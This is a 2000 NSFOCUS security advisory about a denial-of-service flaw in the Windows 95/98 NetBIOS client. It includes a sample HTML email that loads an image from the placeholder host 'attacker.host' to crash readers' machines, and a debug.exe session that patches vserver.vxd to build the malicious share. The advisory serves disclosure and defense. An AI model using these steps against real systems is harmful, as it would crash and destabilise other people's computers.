NSFOCUS SA2000-04: Microsoft Win9x client driver type comparing vulnerability

[Nsfocus Security Team <security () NSFOCUS COM>]

NSFOCUS Security Advisory(SA2000-04)

Topic：Microsoft Win9x client driver type comparing vulnerability

Release Date： Aug 20, 2000
Update Date：  Oct 11, 2000

Affected System:
================
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows 98 Second Edition

Non-affected system：
===================
 - Microsoft Windows NT
 - Microsoft Windows 2000

Impact:
=========

NSFOCUS security team has found a security flaw in Microsoft Win9x NETBIOS client.
Exploitation of this vulnerability , a malicious attacker can modify his file share
service and perform DoS attack to a Win9x client that visits it.

Description：
============

When Win9x client accessing NETBIOS file shared services and comparing the driver
types, if the returned type from server is none of below:"？？？？？"," A："," LPT1："
," COMM"or"IPC"，it will lead to the sixth result, which is fake cause there are only
five of them. So, win9x client will get a wrong driver pointer from conversion,
transfer the control to the wrong driver function address and finally crash.

Malicious user can send an HTML email to his target.
One sample file is like this:

<html>
<body>
hello
<img src="file:\\attacker.host\pub\a.gif">
<body>
</html>

When a win9x client read the malicious HTML email with outlook express or other
email client with HTML support, the client will be DoS.

Exploits:
==========

You can do like this(windows 98 Secondary Edition, English version):

D:\WIN98\SYSTEM>debug vserver.vxd
-d 2b60
1266:2B60  3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
1266:2B70  64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
1266:2B80  05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
1266:2B90  65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
1266:2BA0  1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
1266:2BB0  70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
1266:2BC0  00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
1266:2BD0  91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*.t..@*.
-n vserver.bak    (backup)
-w
Writing 1B8F8 bytes
-n vserver.vxd
-e 2b60 33 c0 c3
-w
Writing 1B8F8 bytes
-q

reboot the machine.

Set a password for a shared directory .

Access the share directory  from another win9x client.
Usually the client will get "blue screen"  ,then the system will become unstable
or halt.

Workaround:
====================

Don't access the untrusted  host's file share service.
Disable NetBIOS over TCP/IP.


Solutions:
====================

Microsoft has been informed.

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT
WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY.
IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER
INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR
REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY
IS NOT MODIFIED IN ANY WAY.

(c) 1999-2000 Nsfocus. All rights reserved. Terms of use.


Nsfocus Security Team <security () nsfocus com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)